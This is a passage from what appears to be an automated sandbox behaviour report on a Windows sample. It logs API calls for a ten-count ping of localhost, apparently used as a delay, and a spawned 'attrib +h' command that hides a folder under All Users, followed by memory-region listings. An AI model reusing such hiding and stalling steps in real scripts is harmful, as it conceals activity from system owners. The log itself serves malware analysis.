sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0198.567] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0198.567] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0198.567] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0198.567] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0198.568] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0198.568] LocalFree (hMem=0x1951e0) returned 0x0 [0198.568] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0198.568] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0198.568] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0198.568] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0198.568] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0198.568] LocalFree (hMem=0x192a10) returned 0x0 [0198.568] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0198.568] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0198.568] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0198.568] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0198.580] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0198.580] LocalFree (hMem=0x198f90) returned 0x0 [0198.580] Sleep (dwMilliseconds=0x3e8) [0199.633] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0199.802] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0199.802] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0199.803] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0199.803] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0199.803] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0199.803] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0199.803] LocalFree (hMem=0x1951e0) returned 0x0 [0199.803] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0199.803] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0199.803] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0199.803] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0199.803] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0199.803] LocalFree (hMem=0x192a10) returned 0x0 [0199.803] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0199.803] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0199.803] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0199.803] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0200.097] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0200.097] LocalFree (hMem=0x198f90) returned 0x0 [0200.097] Sleep (dwMilliseconds=0x3e8) [0201.352] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0201.358] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0201.358] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0201.358] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0201.358] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0201.358] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0201.466] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0201.466] LocalFree (hMem=0x1951e0) returned 0x0 [0201.466] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0201.467] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0201.467] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0201.467] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0201.467] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0201.467] LocalFree (hMem=0x192a10) returned 0x0 [0201.467] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0201.467] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0201.467] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0201.467] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0201.468] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0201.468] LocalFree (hMem=0x198f90) returned 0x0 [0201.468] Sleep (dwMilliseconds=0x3e8) [0202.663] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0202.819] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0202.819] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0202.819] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0202.819] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0202.819] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0202.820] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0202.820] LocalFree (hMem=0x1951e0) returned 0x0 [0202.820] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0202.820] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0202.820] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0202.820] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0202.820] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0202.820] LocalFree (hMem=0x192a10) returned 0x0 [0202.820] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0202.820] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0202.820] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0202.820] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0202.822] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0202.822] LocalFree (hMem=0x198f90) returned 0x0 [0202.822] Sleep (dwMilliseconds=0x3e8) [0203.886] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0204.096] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0204.096] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0204.096] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0204.096] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0204.096] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0204.097] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0204.097] LocalFree (hMem=0x1951e0) returned 0x0 [0204.097] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0204.097] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0204.097] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0204.097] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0204.097] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0204.097] LocalFree (hMem=0x192a10) returned 0x0 [0204.097] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0204.097] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0204.097] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0204.097] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0204.167] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0204.167] LocalFree (hMem=0x198f90) returned 0x0 [0204.167] Sleep (dwMilliseconds=0x3e8) [0205.276] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0205.335] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0205.335] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0205.335] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0205.335] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0205.335] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0205.335] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0205.335] LocalFree (hMem=0x1951e0) returned 0x0 [0205.335] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0205.335] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0205.335] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0205.335] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0205.336] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0205.336] LocalFree (hMem=0x192a10) returned 0x0 [0205.336] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0205.336] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0205.336] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0205.336] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0205.337] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0205.337] LocalFree (hMem=0x198f90) returned 0x0 [0205.337] Sleep (dwMilliseconds=0x3e8) [0206.431] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0206.644] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0206.644] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0206.645] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0206.645] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0206.645] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0206.645] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0206.645] LocalFree (hMem=0x1951e0) returned 0x0 [0206.645] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0206.645] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0206.645] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0206.645] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0206.645] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0206.645] LocalFree (hMem=0x192a10) returned 0x0 [0206.645] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0206.645] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0206.645] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0206.645] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0206.646] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0206.646] LocalFree (hMem=0x198f90) returned 0x0 [0206.646] Sleep (dwMilliseconds=0x3e8) [0207.691] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0207.740] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0207.740] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0207.740] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0207.740] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0207.740] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0207.740] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0207.740] LocalFree (hMem=0x1951e0) returned 0x0 [0207.740] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0207.740] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0207.740] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0207.740] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0207.740] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0207.740] LocalFree (hMem=0x192a10) returned 0x0 [0207.740] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0207.740] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0207.740] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0207.740] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0207.741] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0207.741] LocalFree (hMem=0x198f90) returned 0x0 [0207.741] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xaf718, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0207.741] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xaf6e8, nSize=0x0, Arguments=0xaf6e4 | out: lpBuffer="\x88\x15\x1a") returned 0x58 [0207.741] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", lpszDst=0x1a1588, cchDstLength=0x58 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n") returned 1 [0207.741] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0207.741] _write (in: _FileHandle=1, _Buf=0x1a1588*, _MaxCharCount=0x58 | out: _Buf=0x1a1588*) returned 88 [0207.741] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0207.742] LocalFree (hMem=0x1a1588) returned 0x0 [0207.742] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xaf6f8, nSize=0x0, Arguments=0xaf6f4 | out: lpBuffer="\x98\x15\x1a") returned 0x61 [0207.742] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x1a1598, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0207.742] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0207.742] _write (in: _FileHandle=1, _Buf=0x1a1598*, _MaxCharCount=0x61 | out: _Buf=0x1a1598*) returned 97 [0207.742] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0207.742] LocalFree (hMem=0x1a1598) returned 0x0 [0207.742] IcmpCloseHandle (IcmpHandle=0x198bb0) returned 1 [0207.810] LocalFree (hMem=0x1938f0) returned 0x0 [0207.810] LocalFree (hMem=0x19ec28) returned 0x0 [0207.810] WSACleanup () returned 0 [0207.848] exit (_Code=0) Thread: id = 643 os_tid = 0xb7c Thread: id = 646 os_tid = 0xb24 Thread: id = 647 os_tid = 0xc64 Process: id = "450" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16180" os_pid = "0xb6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "444" os_parent_pid = "0xacc" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28807 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28808 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28809 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28810 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 28811 start_va = 0x2a0000 end_va = 0x2a6fff entry_point = 0x2a0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28812 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28813 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28814 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28815 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 28816 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28817 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28818 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28819 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28820 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 28821 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 28822 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28823 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 